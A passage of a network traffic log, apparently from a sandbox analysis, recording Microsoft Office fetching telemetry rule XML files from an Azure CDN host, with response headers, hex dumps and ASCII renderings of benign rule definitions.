                                                                                                                  2024-11-14 14:00:46 UTC495INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 2160
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                  ETag: "0x8DC582BA3B95D81"
                                                                                                                  x-ms-request-id: cd763138-801e-007b-249d-36e7ab000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-r178fb8d765j7nnvhC1DFW39w400000001q000000000c67m
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_MISS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:46 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  48192.168.2.44980313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:46 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:46 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 408
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                  ETag: "0x8DC582BB56D3AFB"
                                                                                                                  x-ms-request-id: f8aed360-a01e-0032-69a0-341949000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-1749fc9bdbdcm45lhC1DFWeab800000002f0000000009uf7
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:46 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  49192.168.2.44980113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:46 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:46 UTC538INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 3788
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                  ETag: "0x8DC582BAC2126A6"
                                                                                                                  x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-16547b76f7fdtmzhhC1DFW6zhc00000007m000000000cdux
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:46 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  50192.168.2.44980613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:46 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:47 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 474
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                  ETag: "0x8DC582B9964B277"
                                                                                                                  x-ms-request-id: 2cc20079-501e-00a0-320a-369d9f000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-r178fb8d765mr9nqhC1DFWs8m800000000xg000000004vq7
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:47 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  51192.168.2.44980713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:46 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:47 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 415
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                  ETag: "0x8DC582B9F6F3512"
                                                                                                                  x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-16547b76f7f22sh5hC1DFWyb4w0000000khg00000000k10b
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:47 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  52192.168.2.44980813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:47 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:47 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:47 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 471
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                  ETag: "0x8DC582BB10C598B"
                                                                                                                  x-ms-request-id: b0dd9ec7-701e-0001-4e30-36b110000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140047Z-1749fc9bdbdgs9sshC1DFWt6ws00000002qg00000000babm
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:47 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  53192.168.2.44980913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:47 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:47 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:47 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 632
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                  ETag: "0x8DC582BB6E3779E"
                                                                                                                  x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140047Z-16547b76f7fj897nhC1DFWdwq40000000kn000000000720g
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:47 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  54192.168.2.44980013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:47 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:47 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:47 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 450
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                  ETag: "0x8DC582BD4C869AE"
                                                                                                                  x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140047Z-16547b76f7f76p6chC1DFWctqw0000000kwg000000006cc8
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:47 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  55192.168.2.44981113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:47 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:47 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:47 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 467
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                  ETag: "0x8DC582BA6C038BC"
                                                                                                                  x-ms-request-id: 6ba2b82c-f01e-0071-33a3-34431c000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140047Z-1749fc9bdbdwv5sghC1DFWwp6n00000002c000000000edz3
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:47 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  56192.168.2.44981213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:47 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:47 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:47 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 407
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                  ETag: "0x8DC582BBAD04B7B"
                                                                                                                  x-ms-request-id: 933b6e18-c01e-0079-6ca0-34e51a000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140047Z-1749fc9bdbdlfqrwhC1DFWmyg800000000gg00000000c82u
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:47 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  57192.168.2.44981413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:48 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:48 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:48 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 427
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                  ETag: "0x8DC582BA310DA18"
                                                                                                                  x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140048Z-16547b76f7frbg6bhC1DFWr5400000000kpg00000000804s
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
